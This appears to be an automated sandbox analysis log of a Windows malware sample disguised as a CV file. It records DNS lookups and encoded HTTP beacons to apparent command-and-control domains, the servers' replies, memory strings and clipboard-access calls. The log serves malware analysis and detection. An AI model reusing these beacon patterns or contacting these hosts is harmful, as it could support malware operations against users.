                Source: global trafficHTTP traffic detected: GET /6urf/?8z=l+g0G83zvX30P9FhHqUPiCMCp3kC0CiGmxU2wY32UHo7SRAzM3NVc5Nn4wkj2AVHW/hBkkPychobZjIg4/uR1+EuxlxxaYBW6k6qKLTJOsgiw7KKI/jspabCkJT8248+oQ==&afwXa=6nnHQlkprRILE HTTP/1.1Host: www.connecty.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /cpgr/?8z=yUPZw4O96lKRgUDiLQ4YjgWex0ZVjKNUVr3HqoHreXe2a6Vc78U2VxoX4VUOXe2AKNSXv9msRJ2q39Y75lzjKCb8tnAargGvaXZxb0CZL2/WUDIdN/ulbpy32VGDPj7SFQ==&afwXa=6nnHQlkprRILE HTTP/1.1Host: www.tals.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /u9hy/?8z=WqQro+xdjTeJIlGzWne5GtaANfF9lgg49rKxVxpmjgGfbhgcY6AAEIO8u8GwbvTJPVNB3UOdkxCDRvWF6atxHJx7JVXWinhAO2sI58h2p8ITVN90H2WFsxLS9qnZGEsuzw==&afwXa=6nnHQlkprRILE HTTP/1.1Host: www.50food.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /f8c6/?afwXa=6nnHQlkprRILE&8z=qZLxeIvUMpnHejM96/T0f6H04zmKlOMWVFIDlZeaKgP5Xe4TtN4Ku6PXk96ANpScY+aAYV4Nd0GQ4lG6LSWgjSD2yKENm9C4V9rKFkDKUP4Cqcdi4mEHWGKUWB9ccnENVw== HTTP/1.1Host: www.zriaraem-skiry.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /gb2h/?8z=EASy0dFQ3+mIcpYg1BhqvEqrUNk9skL9wz6GDDYkBoOZntt4ETpAdTcmLSDA/l8Pq56TjzGqLUU3SQIDrjgXIr49oxoJg0asAGStZmb1Pixrpd6NwrYyT6qlasg7QhQxcA==&afwXa=6nnHQlkprRILE HTTP/1.1Host: www.nmgzjwh.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /gdvz/?8z=42oDQZKHBS2RpvFMBZ7EzkD144AzeGctXRowK0Gqt433jWsXILGJddh+nwwRXUDcpHF9qTVEG6VDXm2WV9OiTRVapNS+KsXc4QK7u4kHLuXU5OsjWi1vwOB1/wMg5LW4+w==&afwXa=6nnHQlkprRILE HTTP/1.1Host: www.sklad-iq.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.grandesofertas.fun
                Source: global trafficDNS traffic detected: DNS query: www.jijievo.site
                Source: global trafficDNS traffic detected: DNS query: www.ytsd88.top
                Source: global trafficDNS traffic detected: DNS query: www.bpgroup.site
                Source: global trafficDNS traffic detected: DNS query: www.fortevision.xyz
                Source: global trafficDNS traffic detected: DNS query: www.rtpterbaruwaktu3.xyz
                Source: global trafficDNS traffic detected: DNS query: www.prhmcjdz.tokyo
                Source: global trafficDNS traffic detected: DNS query: www.connecty.live
                Source: global trafficDNS traffic detected: DNS query: www.tals.xyz
                Source: global trafficDNS traffic detected: DNS query: www.50food.com
                Source: global trafficDNS traffic detected: DNS query: www.zriaraem-skiry.sbs
                Source: global trafficDNS traffic detected: DNS query: www.nmgzjwh.net
                Source: global trafficDNS traffic detected: DNS query: www.sklad-iq.online
                Source: global trafficDNS traffic detected: DNS query: www.supernutra01.online
                Source: unknownHTTP traffic detected: POST /z9pi/ HTTP/1.1Host: www.jijievo.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateOrigin: http://www.jijievo.siteReferer: http://www.jijievo.site/z9pi/Content-Type: application/x-www-form-urlencodedConnection: closeCache-Control: no-cacheContent-Length: 203User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 24 Nov 2024 07:20:30 GMTContent-Type: text/htmlContent-Length: 409Connection: closeETag: "66d016cf-199"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 24 Nov 2024 07:20:33 GMTContent-Type: text/htmlContent-Length: 409Connection: closeETag: "66d016cf-199"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 24 Nov 2024 07:20:36 GMTContent-Type: text/htmlContent-Length: 409Connection: closeETag: "66d016cf-199"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 24 Nov 2024 07:20:38 GMTContent-Type: text/htmlContent-Length: 409Connection: closeETag: "66d016cf-199"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sun, 24 Nov 2024 07:20:46 GMTserver: LiteSpeed
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sun, 24 Nov 2024 07:20:49 GMTserver: LiteSpeed
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sun, 24 Nov 2024 07:20:52 GMTserver: LiteSpeed
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sun, 24 Nov 2024 07:20:54 GMTserver: LiteSpeed
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Sun, 24 Nov 2024 07:21:16 GMTserver: LiteSpeed
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 796 | date: Sun, 24 Nov 2024 07:21:19 GMT | server: LiteSpeed | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 796 | date: Sun, 24 Nov 2024 07:21:21 GMT | server: LiteSpeed | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 796 | date: Sun, 24 Nov 2024 07:21:24 GMT | server: LiteSpeed | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sun, 24 Nov 2024 07:21:47 GMT | Server: Apache | Content-Length: 514 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sun, 24 Nov 2024 07:21:50 GMT | Server: Apache | Content-Length: 514 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sun, 24 Nov 2024 07:21:52 GMT | Server: Apache | Content-Length: 514 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sun, 24 Nov 2024 07:21:55 GMT | Server: Apache | Content-Length: 514 | Connection: close | Content-Type: text/html; charset=utf-8 | Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx | Date: Sun, 24 Nov 2024 07:22:11 GMT | Content-Type: text/html | Content-Length: 166 | Connection: close | Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx | Date: Sun, 24 Nov 2024 07:22:14 GMT | Content-Type: text/html | Content-Length: 166 | Connection: close | Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx | Date: Sun, 24 Nov 2024 07:22:17 GMT | Content-Type: text/html | Content-Length: 166 | Connection: close | Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Sun, 24 Nov 2024 07:22:19 GMT | Content-Type: text/html | Content-Length: 0 | Connection: close
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sun, 24 Nov 2024 07:22:31 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Last-Modified: Thu, 29 Aug 2024 10:57:57 GMT | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bt%2FC5g%2BuGtiOfW3NoAmUKTGD%2FGXnYmr8EN7hAqypXDHX2JqtePdyuaDrMkj0V1nMONioeE1h176%2B0V5B87UWTyRS5IpHWtDJwrxN3SWYcumNbHF8f0syOch4g776B30TS%2Fqnv7PJFsti"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8e77a5f97cfe421b-EWR | Content-Encoding: gzip | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=1708&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=738&delivery_rate=0&cwnd=166&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sun, 24 Nov 2024 07:22:34 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Last-Modified: Thu, 29 Aug 2024 10:57:57 GMT | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sV5gaq%2BEQPf97UTDiHs%2BuWvJLQOCFCfTSHiB%2FLGkH4BIIaNZFpdoABY8yZ7XRd28BZw33w3gKfJUk3k9fa7tJKC1eC8nEYniMgi7fiV0b%2FaWZKVn5S98ueYX%2F63wMvyhBlxQLAyMvmfg"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8e77a60a9a7fde98-EWR | Content-Encoding: gzip | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=1423&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=758&delivery_rate=0&cwnd=204&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sun, 24 Nov 2024 07:22:36 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Last-Modified: Thu, 29 Aug 2024 10:57:57 GMT | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fRvagLVKRbBUBB3xsgc3XdVg%2BtRzWfjkVXdCfefBuTCXNPaaSybvddwehSm1BQ4HmzvL4qL%2FW%2Bnbc3PBS2l%2BRX0EBN9f0Uf%2BQpfAvvZLKVqg7MAulquslSCEvJWoYNEIif0l2egXTA6f"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8e77a61b4fe1c35f-EWR | Content-Encoding: gzip | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=1489&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1775&delivery_rate=0&cwnd=172&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sun, 24 Nov 2024 07:22:39 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Last-Modified: Thu, 29 Aug 2024 10:57:57 GMT | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xuEpzTEQwiEr9pCWHOAt6GEHC9QJ3PfNEfQcCKUogiXO3by%2B0Ue1yGs%2BPFKOdKGAEfed9Tnr%2FfKX0aRpUsVL4ZHtBVwgB9IJcxhAISxFprFs7WwPa79wrIEECpP3U2bFPmH4N%2B1P71N4"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8e77a62bfc4741cd-EWR | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=2393&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=478&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" | Data Ascii: 57d<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 &mdash; Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="Sorry, page not found"/> <style type="text/css"> body {font-siz
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sun, 24 Nov 2024 07:22:46 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oiIxfgFWAwX3ZP%2Fny6yOkgCNB2rlO6IOkkuDY%2FWx6KqbuvsoweO%2BmGQyk5sHLptlMeumM48tz04SQyZYsTePMBYFvtX6pWp5jRfYbRgsVbnSM7SwYR4ZKR12nN7v%2FEj3pU4%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8e77a656edcfc338-EWR | Content-Encoding: gzip | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=1458&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=717&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:22:49 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6%2BspKrhslZnvbJLaC9693y03YuXnmMnzuPJ1OUa4vMa%2FBJw7a%2FO58PMCNRpnVk055CeTUgOvC4IB9uUh6E6MXBjxCGTOnMIl7ffbnqUc3EJm5tkrr3%2F9IAA5dcvllGwA5yw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e77a667cae243b2-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2236&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=737&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:22:54 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gjuuwbQWjW%2BOROeAWS0JYmJA8HgYGxlrySVbvOzI%2FuFj7peIu1U1LlBO6fAaEhQyxmCUxA866Yl2Wdmvbmpb5qq8vV5Sngfl6FVY26khjkVILYdOy7ETYl6cttQ92R9QV9c%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e77a6890b221921-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1424&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=471&delivery_rate=0&cwnd=144&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Ascii: 8a<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 24 Nov 2024 07:23:01 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzip
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 24 Nov 2024 07:23:04 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzip
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 24 Nov 2024 07:23:06 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzip
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 24 Nov 2024 07:23:09 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: close
                Source: NObNfBLfyhvzeH.exe, 00000006.00000002.4526286299.0000000003D38000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://narman.com/
                Source: NObNfBLfyhvzeH.exe, 00000006.00000002.4528088179.0000000004E2E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.supernutra01.online
                Source: NObNfBLfyhvzeH.exe, 00000006.00000002.4528088179.0000000004E2E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.supernutra01.online/x1zr/
                Source: winver.exe, 00000005.00000003.2576035221.00000000075F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: winver.exe, 00000005.00000003.2576035221.00000000075F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: winver.exe, 00000005.00000002.4527534304.0000000005B72000.00000004.10000000.00040000.00000000.sdmp, NObNfBLfyhvzeH.exe, 00000006.00000002.4526286299.0000000003882000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
                Source: winver.exe, 00000005.00000003.2576035221.00000000075F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: winver.exe, 00000005.00000003.2576035221.00000000075F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: winver.exe, 00000005.00000003.2576035221.00000000075F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: winver.exe, 00000005.00000003.2576035221.00000000075F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: winver.exe, 00000005.00000003.2576035221.00000000075F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: winver.exe, 00000005.00000002.4527534304.000000000634C000.00000004.10000000.00040000.00000000.sdmp, NObNfBLfyhvzeH.exe, 00000006.00000002.4526286299.000000000405C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
                Source: winver.exe, 00000005.00000002.4525083909.0000000002A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/o
                Source: winver.exe, 00000005.00000002.4525083909.0000000002A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: winver.exe, 00000005.00000002.4525083909.0000000002A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: winver.exe, 00000005.00000002.4525083909.0000000002A6C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033#p
                Source: winver.exe, 00000005.00000002.4525083909.0000000002A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: winver.exe, 00000005.00000002.4525083909.0000000002A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: winver.exe, 00000005.00000003.2569339086.00000000075EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: winver.exe, 00000005.00000002.4527534304.000000000634C000.00000004.10000000.00040000.00000000.sdmp, NObNfBLfyhvzeH.exe, 00000006.00000002.4526286299.000000000405C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.sklad-iq.online&rand=
                Source: winver.exe, 00000005.00000002.4527534304.000000000634C000.00000004.10000000.00040000.00000000.sdmp, NObNfBLfyhvzeH.exe, 00000006.00000002.4526286299.000000000405C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://reg.ru
                Source: winver.exe, 00000005.00000002.4527534304.0000000005398000.00000004.10000000.00040000.00000000.sdmp, NObNfBLfyhvzeH.exe, 00000006.00000002.4526286299.00000000030A8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.bt.cn/?from=404
                Source: winver.exe, 00000005.00000003.2576035221.00000000075F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: winver.exe, 00000005.00000003.2576035221.00000000075F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: winver.exe, 00000005.00000002.4527534304.0000000005074000.00000004.10000000.00040000.00000000.sdmp, NObNfBLfyhvzeH.exe, 00000006.00000002.4526286299.0000000002D84000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2690521155.000000003ED04000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.grandesofertas.fun/wu6o/?8z=PAJ2EBywaoPRtAODirkpgxGfmSmLR9nxYR74cZ8tmddFXtcUCShy8K9wuzUR
                Source: winver.exe, 00000005.00000002.4527534304.000000000634C000.00000004.10000000.00040000.00000000.sdmp, NObNfBLfyhvzeH.exe, 00000006.00000002.4526286299.000000000405C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.sklad-iq.online&utm_medium=parking&utm_campaign=s_land_
                Source: winver.exe, 00000005.00000002.4527534304.000000000634C000.00000004.10000000.00040000.00000000.sdmp, NObNfBLfyhvzeH.exe, 00000006.00000002.4526286299.000000000405C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.sklad-iq.online&utm_medium=parking&utm_campaign=s_land
                Source: winver.exe, 00000005.00000002.4527534304.000000000634C000.00000004.10000000.00040000.00000000.sdmp, NObNfBLfyhvzeH.exe, 00000006.00000002.4526286299.000000000405C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.sklad-iq.online&utm_medium=parking&utm_campaign=s_land_ho
                Source: winver.exe, 00000005.00000002.4527534304.000000000634C000.00000004.10000000.00040000.00000000.sdmp, NObNfBLfyhvzeH.exe, 00000006.00000002.4526286299.000000000405C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/sozdanie-saita/
                Source: winver.exe, 00000005.00000002.4527534304.000000000634C000.00000004.10000000.00040000.00000000.sdmp, NObNfBLfyhvzeH.exe, 00000006.00000002.4526286299.000000000405C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.sklad-iq.online&amp;reg_source=parking_auto
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_00116B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00116B0C
